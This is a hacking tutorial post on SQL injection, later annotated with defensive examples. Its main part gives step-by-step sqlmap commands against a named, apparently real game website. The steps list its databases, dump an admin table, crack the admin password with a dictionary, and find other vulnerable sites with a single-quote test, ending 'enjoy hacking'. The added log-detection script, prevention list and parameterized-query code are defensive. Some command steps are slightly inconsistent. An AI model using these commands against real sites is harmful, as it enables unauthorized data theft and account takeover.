HACKING A WEBSITE
What is SQL injection?
SQL injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application-layer attack techniques used today. It takes advantage of improper coding in web applications that allows an attacker to inject SQL commands into, say, a login form and so gain access to the data held in the database.
In essence, SQL injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.
How does it cause vulnerabilities?
It can lead to vulnerabilities because attackers can send values to an application that they know will be interpolated into a SQL string. By crafting those values carefully, they can manipulate the result of queries, reading or even changing data that they should not be allowed to access.
How to use it in BackTrack?
1. Open a terminal and go to the sqlmap directory:
- cd /pentest/web/scanners/sqlmap/
2. To use it, type:
- python sqlmap.py -u http://Target.com/index.php?id=1 --dbs (for databases)
- python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) --tables
- python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) --columns
- python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) -C (columname) --dump
1) Open a terminal in BackTrack 5.
2) Type cd /pentest/database/sqlmap
3) Then type: python sqlmap.py -u http://mappn.com/game.php?id=9 --dbs
4) http://mappn.com/game.php?id=9 is the website that we are going to hack.
5) id=9 is vulnerable, that is, it is easy to hack.
6) [*] information_schema
[*] us_mappn
These are the 2 available databases on the website.
7) Then search for tables and columns.
8) python sqlmap.py -u http://mappn.com/game.php?id=9 -D (database name) --tables
9) Leave information_schema; it is the database that will be available on every website.
10) Then find the system admin table.
11) Then type: python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin --columns
12) We have already found the admin table; now we get its contents.
13) Then type: python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin -U test --dump
14) Then, using a common default dictionary method, we crack the password.
15) Now the user ID and the password have been cracked.
Now, how to find vulnerable websites:
Go to http://mappn.com/game.php?id=9 and append a single quote ('):
mappn.com/game.php?id=9'
Now press Enter. If an SQL error appears, the page is vulnerable.
Thank you and enjoy hacking.
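Seen from the server side, the single-quote test and the sqlmap run described above leave recognizable entries in the web access log. The following is an added example, not part of the original post: the log lines are constructed, and `NUMERIC_PARAMS` and `find_sqli_probes` are hypothetical names chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2013:10:01:02 +0000] "GET /game.php?id=9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2013:10:01:09 +0000] "GET /game.php?id=9%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.44 - - [10/Mar/2013:10:02:30 +0000] "GET /game.php?id=9 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.9 - - [10/Mar/2013:10:03:00 +0000] "GET /news.php?title=o%27brien HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects as integers


def find_sqli_probes(log_text):
    """Return (client_ip, reason) for requests that look like SQL injection probing."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, target, status, agent = m.groups()
        # sqlmap identifies itself in the User-Agent header unless told otherwise.
        if agent.lower().startswith("sqlmap/"):
            hits.append((ip, "sqlmap User-Agent"))
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            # A quote or any other non-digit in an integer parameter matches the
            # manual test; a 5xx reply suggests the value reached the SQL layer.
            if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                reason = "non-numeric value in '%s'" % name
                if status.startswith("5"):
                    reason += " with server error"
                hits.append((ip, reason))
    return hits


if __name__ == "__main__":
    for ip, reason in find_sqli_probes(SAMPLE_LOG):
        print(ip, reason)
```

The User-Agent check only catches a tool left at its defaults, so the parameter check is the more reliable signal; the quote in the free-text `title` parameter is deliberately not flagged.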
How to prevent SQL attacks?
- Strict type checking (don't trust what the user enters).
- If you expect a user name to be entered, validate that it contains only alphanumeric characters.
- Escape or filter special characters in user input.
- Use prepared statements to execute the queries.
- Don't allow multiple queries to be executed in a single statement.
- Don't leak database information to the end user by displaying "syntax errors", etc.
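The interpolation problem described under "How does it cause vulnerabilities?" and the fixes in the list above, side by side. This is an added example, not code from the original post: it uses Python's built-in sqlite3 module in place of the site's real database, and the `games` table, its rows and all function names are constructed for illustration.

```python
import sqlite3


def make_db():
    # Constructed in-memory data standing in for the application's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO games VALUES (?, ?)", [(9, "Chess"), (10, "Go")])
    return db


def lookup_vulnerable(db, raw_id):
    # BEFORE: the request value is interpolated into the SQL string, so
    # whatever the client sends is parsed as part of the statement.
    return db.execute("SELECT title FROM games WHERE id = " + raw_id).fetchall()


def lookup_safe(db, raw_id):
    # AFTER: strict type check first (ASCII digits, small enough for a 64-bit
    # INTEGER), then a prepared statement. The bound value is passed as data
    # and is never parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        raise ValueError("id must be an integer")
    return db.execute("SELECT title FROM games WHERE id = ?", (int(raw_id),)).fetchall()


def handle_request(db, raw_id):
    """Return (status, body). Database error text is never sent to the client."""
    try:
        rows = lookup_safe(db, raw_id)
    except ValueError:
        return 400, "Bad request"
    except sqlite3.Error:
        return 500, "Internal error"  # log the details server-side only
    return (200, rows[0][0]) if rows else (404, "Not found")


def demo():
    db = make_db()
    leaked = lookup_vulnerable(db, "9 OR 1=1")  # constructed input: matches every row
    try:
        lookup_vulnerable(db, "9'")  # the single-quote test: raw SQL error
        quote_error = None
    except sqlite3.Error as exc:
        quote_error = type(exc).__name__
    return leaked, quote_error, handle_request(db, "9 OR 1=1"), handle_request(db, "9'"), handle_request(db, "9")
```

With the hardened handler, both constructed inputs are rejected with a generic 400 before any query runs, while the legitimate `id=9` request still returns its row.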